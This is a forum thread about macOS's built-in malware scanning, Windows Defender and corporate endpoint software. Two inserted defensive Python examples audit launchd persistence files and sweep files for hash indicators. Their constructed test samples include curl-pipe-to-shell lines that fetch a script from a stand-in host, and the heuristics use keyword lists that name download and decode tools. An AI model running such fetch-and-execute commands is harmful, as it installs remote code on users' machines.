There was a really bad Dark Ages of remote exploits which peaked around the early Windows XP era. The OS itself and Internet Explorer were a horror show.
Other than that, yes, it's been fairly rare to have malware infections that don't start with tricking the user into executing a binary, though it certainly can happen.
In 30+ years of having computers I’ve had issues twice.
Once was on in the 3.11 days. Turned out the copy of KidPix we bought had a virus on the installation disks.
The other was in the late 2000s at work on XP. I got some piece of malware (showed ads IIRC) from a drive-by using a Java exploit in an applet shown by an ad network.
If you’re not doing high-risk stuff it’s not hard to avoid. But I’m glad MacOS has this built in just in case (like MSE on Windows).
It's possible, definitely. I've had some amount of luck. But I think if we had good measurements we'd find that getting a virus through those means on personal machines is rare.
Ok, but give me a choice, it's my computer and I should be able to decide what it runs. For example, I might care about my battery life, record low latency video and audio or prefer a different anti-malware product.
> scans lasting 15-35 seconds every hour or two during periods of low user activity
Doesn't sound like that's going to use substantial battery nor outprioritize low-latency A/V. Long before Apple was known for battery life, they were known for real time media. (I won't speak to user choice though since I'm not clear on which parts are optional should you choose to tinker with macOS.)
I’m pretty happy with a combination of this malware scanning and some Objective See products [0] that can alert me to new network requests or strange behavior like dylib hijacking. Currently I’m running LuLu (firewall) and BlockBlock (persistence monitoring), and I occasionally run the other utilities when I get suspicious of something.
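The persistence monitoring this comment (and the earlier mention of "persistence lockout popups") relies on can also be done as an on-demand audit rather than a live popup. The block below is an added example and is not Objective-See's or Apple's code: it walks launchd plist directories, extracts the program each job runs, and applies a few heuristics. The directory list, the heuristics and the sample plists are assumptions constructed for the example.

```python
"""On-demand audit of launchd persistence plists.

Added example, not Objective-See's or Apple's code. The heuristics are
assumptions; the sample plists are constructed and written to a temp dir.
"""
import plistlib
import tempfile
from pathlib import Path

# Where launchd looks for user- and admin-installed jobs (assumed list).
PERSIST_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"]
SUSPECT_PATH_FRAGMENTS = ("/tmp/", "/var/tmp/", "/Downloads/", "/Library/Caches/", "/Users/Shared/")
SUSPECT_ARG_TOKENS = ("curl ", "wget ", "base64 ", "osascript -e")
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


def program_of(plist):
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    args = list(plist.get("ProgramArguments", []))
    prog = plist.get("Program") or (args[0] if args else "")
    return prog, args


def audit_plist(path):
    """Return (label, program, [reasons]) for one plist file."""
    with open(path, "rb") as f:
        plist = plistlib.load(f)
    prog, args = program_of(plist)
    label = plist.get("Label", Path(path).stem)
    reasons = []
    if any(frag in prog for frag in SUSPECT_PATH_FRAGMENTS):
        reasons.append("program lives in a user-writable staging location")
    if any(tok in " ".join(args) for tok in SUSPECT_ARG_TOKENS):
        reasons.append("arguments contain a download/decode/script stage")
    # Malware likes Apple-looking labels; Apple's own jobs run system-path binaries.
    if label.startswith("com.apple.") and not prog.startswith(SYSTEM_PREFIXES):
        reasons.append("Apple-looking label but program outside system paths")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (relaunched if killed)")
    return label, prog, reasons


def audit_dirs(dirs):
    """Audit every *.plist under the given directories; return only flagged jobs."""
    findings = []
    for d in dirs:
        for p in sorted(Path(d).expanduser().glob("*.plist")):
            try:
                label, prog, reasons = audit_plist(p)
            except Exception as exc:  # a plist launchd cannot parse is itself worth a look
                findings.append((p.stem, "", [f"unparseable plist: {exc}"]))
                continue
            if reasons:
                findings.append((label, prog, reasons))
    return findings


def demo():
    """Write three constructed plists to a temp dir and audit them."""
    samples = {
        "com.example.backup": {"Label": "com.example.backup", "RunAtLoad": True,
                               "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/backup-agent", "--quiet"]},
        "com.installer.update": {"Label": "com.installer.update", "RunAtLoad": True, "KeepAlive": True,
                                 "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL https://example.invalid/s | sh"]},
        "com.apple.softwareupdate.helper": {"Label": "com.apple.softwareupdate.helper", "RunAtLoad": True,
                                            "Program": "/Users/Shared/.cache/updater"},
    }
    with tempfile.TemporaryDirectory() as d:
        for name, plist in samples.items():
            with open(Path(d) / f"{name}.plist", "wb") as f:
                plistlib.dump(plist, f)
        return audit_dirs([d])


if __name__ == "__main__":
    for label, prog, reasons in demo():
        print(label, "->", prog)
        for r in reasons:
            print("  -", r)
```

Run with `audit_dirs(PERSIST_DIRS)` on a real Mac; `demo()` only exercises the constructed samples. This catches the plist-based persistence that BlockBlock watches live, but not the other places an implant can live (login items, cron, configuration profiles, dylib proxying), which is why the comment pairs it with a firewall and occasional use of the other tools.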
If I had to guess they probably use stock OS for most employees and defer to network-level filtering beyond that. Not because their stock OS behavior is wildly secure or anything, but because they’re notoriously secretive and have other reasons to have very tight restrictions on external network access.
Is this just a pandora box where all files are scanned and checksummed'd and then uploaded to a central server?
Would it tie into CSAM for apple devices? They say PUP, but what if it's politically unwated files and they wanted to discover the creator of a file/photo?
North Korea is criticized highly for pushing watermarking in its nix distribution, but the way Microsoft Defender works for enterprise is that you have an agent on every PC, which scans all files - and that can be a "canary" for files being modified / searching the org at once for a specific hash that means you're infected or not (yes, it is trivial to pad bytes to change the checksum string, but still)
I do not know how macOS does its scanning, or reporting, but that is the biggest thing I'd be looking for - we already have Gatekeeper that keeps unsigned apps from "easily" being run, or even self signed/unwanted signed apps from easily being executed which operates on a checksum basis.
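The "search the org for a hash" and "trivial to pad bytes" points above can be shown concretely. The block below is an added example, not Defender's or Apple's code: a sweep that matches files against a full-file SHA-256 IOC list, a demonstration that one appended byte defeats it, and a prefix hash (first 1024 bytes, an assumed size) as the simplest padding-resistant variant. The sample file is a constructed stand-in for a known-bad script, not real malware.

```python
"""Hash-based IOC sweep, and why appended padding defeats it.

Added example (not Microsoft's or Apple's code). PREFIX_LEN and the
sample bytes are assumptions constructed for the demonstration.
"""
import hashlib
import tempfile
from pathlib import Path

PREFIX_LEN = 1024  # assumed prefix size for the padding-resistant hash


def sha256_file(path, limit=None):
    """SHA-256 of a whole file, or of its first `limit` bytes when given."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        if limit is not None:
            h.update(f.read(limit))
        else:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
    return h.hexdigest()


def sweep(root, full_iocs, prefix_iocs=frozenset()):
    """Return [(filename, indicator kind)] for files matching either IOC set."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        if sha256_file(p) in full_iocs:
            hits.append((p.name, "full-hash"))
        elif sha256_file(p, PREFIX_LEN) in prefix_iocs:
            hits.append((p.name, "prefix-hash"))
    return hits


# Constructed stand-in for a known-bad dropper; longer than PREFIX_LEN on purpose.
SAMPLE = (b"#!/bin/sh\n# constructed stand-in for a known-bad dropper script\n"
          b"curl -fsSL https://example.invalid/stage2 | sh\n") + bytes(range(256)) * 8


def demo():
    """Sweep a temp dir holding the sample, a padded copy, and a clean file."""
    padded = SAMPLE + b"\x00"  # a single appended byte changes the full-file hash
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "original.sh").write_bytes(SAMPLE)
        (root / "padded.sh").write_bytes(padded)
        (root / "clean.txt").write_bytes(b"nothing to see here\n")
        full_iocs = {hashlib.sha256(SAMPLE).hexdigest()}
        prefix_iocs = {hashlib.sha256(SAMPLE[:PREFIX_LEN]).hexdigest()}
        return {
            "full_only": sweep(root, full_iocs),
            "with_prefix": sweep(root, full_iocs, prefix_iocs),
        }


if __name__ == "__main__":
    for mode, hits in demo().items():
        print(mode, hits)
```

The prefix hash only survives padding appended at the end; a rebuild that changes the first bytes, or a prepended stub, defeats it just as easily, which is why real products pair exact hashes with similarity hashes (ssdeep, TLSH) and, more importantly, with the behavioural signals discussed elsewhere in the thread.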
I'm only 50% joking when I say the most impactful security measure Microsoft ever took on Windows was to add pretty picture wallpapers that change automatically
How does this compare to bitdefender? We use bitdefender at work and I'd like to have a coffee with the security team and see if we can't get this instead. Bitdefender ruins the performance of my m1 mbp.
Try using MacOS in an enterprise. They locked the fucking power settings on me, even though I use my own power at home. So it goes to sleep after 10 minutes with no mouse movement, drops the VPN and all my SSH sessions, and then forgets my monitor layout.
Computers work pretty damn well most of the time, but as soon as enterprise IT gets their hands on it, they clog it up with poorly written, well marketed security software. We have shit like privilege managers running so that we can install "whitelisted" apps. Still have MS endpoint protection, which is a total piece of shit. All the MDM shit that runs in the background, some password sync manager, a goddamn locally installed proxy that hijacks all your web traffic. JAMF always in there fucking crashing and doing who knows what.
And we migrated our laptops when our company was bought out. And so the entire security suite was completely different. All the old security software was removed, but left cruft, and extensions and shit all over the computer. All our computers run like total dogshit until an OS reload.
All this bullshit that makes our productivity crawl to a halt, just so that they can check some boxes on a security audit.
Right. I always thought that a non-trivial part of the bad rep of Windows comes from the fact that lots of people were forced to use it at work with tons of enterprise junkware that was barely distinguishable from unremovable malware. My home Windows machines on much weaker hardware always ran a lot better than machines at work. And in the past few years it feels like my corporate JAMF managed MacBook is heading in the same direction.
My sympathies! Sounds like a nightmare story indeed and I might refuse a company's offer on the basis of having to go through this alone... Although can't deny that for the most of us US salaries are pretty damn appealing.
Truthfully, if I was director of IT and security, I'd likely just source all laptops in my department and preinstall everything needed and then ship the machine to the new employee, giving them passwords through a secure channel e.g. Signal / encrypted Telegram chats / PGP'd mail etc.
I've worked once on a corporate Linux laptop and it was a nightmare. The machine in particular wasn't very good and was easily overheating and its fans were always spinning, and of course the VPN worker crashed every 3-4h or so -- which still wasn't a big deal for a 8h working day, mind you, but you did have to always be prepared for the next thing you're doing to fail with a mysterious network failure.
Again, sympathies. It sounds like a shit show. Another thing I'd consider would just be to ship everyone the same 8GB RAM laptops that all remote into cloud instances. Machine stolen? Tokens / passwords / keys expire every hour anyway even if the IT is asleep at the wheel for that one hour, so who cares.
Organizations are being denied cyber liability coverage for not having EDR across the board. Without the data to prove what didn’t happen, most regs require assuming the worst, possibly resulting in hefty fines. Unfortunately the current cyber landscape does not favor the worker.
I feel your annoyance about it going to sleep, but you should be able to run the built-in 'caffeinate' command in the terminal to prevent sleep -- you don't need to install Amphetamine.
If for some reason that didn't work, you can also find a long YouTube video to play on mute -- videos disable sleep as well.
It's the other way around for me. Had been happy with Linux until gnome 3, then just when commercial apps were there, usability went downhill, and kde just sucks in another way. I know about SIP and other crap, but using Linux desktops just ceased to be fun and gets in the way a lot, so I'm looking forward to buying a MacBook again after many years.
Well admittedly my main reason for wanting to switch is not the kind-of-intrusive virus scanner.
I want to experiment with a lot of tech and 99% of it is only accessible in Linux. I want to try more things than just what I'm paid to do today so that kind of finalized the decision.
As for desktop Linux, I know it's a challenge. But I'll make it work. I feel it's a worth investment.
That's a different thing though. I don't want Zoom and Chrome pwning my system. I just want less intrusive antivirus software. Or at least have the decency to show up on the menu bar's status icons list with a spinning icon or whatever.
Apparently that's too much to ask. No, I have to find out why my compilation is currently going 2x slower by checking the CPU load and seeing yet another XWhateverService taking up 200% CPU and 50% SSD capacity.
Various XProtect or XService (or something similar) processes. I looked them up about a year ago, they check out to be Apple services.
Problem is they fire up at the most random of times and sometimes really get in the way of my work. Granted it's never more than 30-60 seconds but I am growing weary of having to fight my system or choose to just give up and wait.
This is a push in the right direction, but the fact that it took this long is amazing to think about. I'll personally still install AV on MacOS. You can never be too safe.
I already ditched third party antivirus programs on Windows for Defender. Would be really lovely if I could also ditch my third party antivirus on all other OS like macOS.
There are command line knobs to turn these features off. You can disable SIP, or you can disable the system policy (which disables Gatekeeper and XProtect).
It's definitely a case of "just because you can, doesn't mean you should".
CPUs are basically on or off, so as long as it was doing something anyway, it's unlikely this can use much power or you'd even notice. Don't look and you'll be happy.
I have not seen this behavior on any of my Macs, and what you're describing is not normal.
I'm not saying that you're necessarily wrong, but there are many different things that could also cause this. Some investigation would be in order before making that claim. (Spotlight indexing via mdworker is the usual first culprit for this kind of behavior, in my experience.)
You should be able to see what's causing the extra load by keeping an eye on Activity Monitor.
Last couple times I got tons of beachballs system-wide for no clear reason, it was because I was doing Android dev and had the emulator running, or, earlier, because I hadn't yet switched to Safari. Both FF and Chrome did that to me, though Chrome was slightly better about it.
I have an M1 MacBook Air, and a 2018 MacBook Pro. Neither of them ever have beachballs. Something is either hogging resources on your system, or it's just an older machine.
Do they still make the default user an admin account? If so, this is, in my opinion, a band-aid designed to prevent users experiencing any bother. Actual security measures will almost always introduce friction - I'd love to be able to leave my front door open but I have to use a key.
The default is still “admin” in the sense that it can sudo or equivalent. But quite a lot of the OS itself has been isolated from sudo/etc, and in recent versions isolated to a read-only FS. And quite a lot of the native APIs (eg file system access outside the app’s isolated storage) have been restricted to require asking for explicit permission before they can be used. Some functionality has even been restricted to require direct authentication (notably: password autofill in Safari). The FS access limitations feel most frictionful, but nowhere near so much as earlier Windows forays into this kind of UI; the downside of that is that it’s easy to forget what access you’ve granted.
Most of the rest of macOS defenses depend on almost totally invisible malware mitigations. “Almost totally” as in you don’t even know it’s running unless you happen to spot it in a process monitor.
Apple mostly strikes a good balance in macOS (IMO) between locking as many doors as it can without getting in your way, good default UI tradeoffs, mostly reasonable escape hatches if you really do know what you’re doing, and very inconvenient escape hatches for actions which truly leave your proverbial front door unlocked. (The latter involve rebooting into the recovery volume and entering explicit commands into a CLI.) If you’re a high value target, obviously none of this is sufficient. If you’re a rando user with relatively not-reckless habits, at this point it’s like gambling with odds so close to break-even most users have good reason to think it’s a solved problem.
I don’t know what you’re referring to. In my experience, the only SSH-related thing I’ve had reverted is needing to reauthorize Keychain-based access after login if I don’t automate it. Never had my SSH config become less restricted after an update of any kind.
Thank you for clarifying and glad there’s a workaround. I mistakenly thought you meant ssh out. Haven’t had a need to ssh into any Mac for close to 20 years.
If I remember right it happened without warning and reverted my key-only config when they added SIP in an update. I believe earlier updates never wiped out my change. It left me with an insecure setup that thankfully wasn't port-forwarded publicly.
Though "Admin" likely does not mean as much as you think on macOS, as long as you keep SIP enabled (which is the default, and disabling requires explicit rebooting into a recovery OS and opening the terminal there).
Windows Defender is scanning every time I'm building anything in Visual Studio, during which everything on the machine grinds to a halt. I have no idea what it's hoping to find but the experience on Windows is execrable. If I'm listening to some audio it starts stuttering… Very beefy machine too: ThinkStation desktop, 64GB RAM, 8 cores, etc etc. I stopped caring and started relaxing because it's out of my control. And you guessed it, it's my office machine. At home I banished Windows altogether.
If you are able, add your project folder as an exclusion, and maybe msbuild.exe or maybe cl etc. Can't hurt.
Though I have to say I've never had Defender (or any IO hits) cause audio to stutter outside of impending bluescreens from garbage device-driver-tier crashes.
My only hope is that this makes, erm, certain people at least give pause in the future before posting "but Windows Defender can't be turned off and scans all the time" in any threads about Windows.
Everyone complained constantly when 95-XP got viruses if you looked at them and you had to buy terrible AV programs and it still wasn’t enough.
Now the OS takes care of the vast majority of it and problems aren’t rampant.
And what do we do? Complain it might be slowing things down. That it’s taking away control. That if we want to load a virus on our computers the OS should never question us. And don’t forget this is a secret conspiracy to track us.
There’s no winning. Poor OSes. Always doing it wrong.
One surprising thing about the macbook I got last year is how often I find it burning hot with the fan going crazy despite the lid having been closed for hours. Is this in any way related to the malware scanning? The computer has been like this from the start, so I'm pretty confident it's not related to anything I changed/added.
I remember it being such a ^%#*show on Windows until I think it was called Microsoft Security Essentials? And then that got folded into Windows?
I recall as a teen how hard it was to recommend antivirus because so many of them were garbage. And then MSE made it effortless.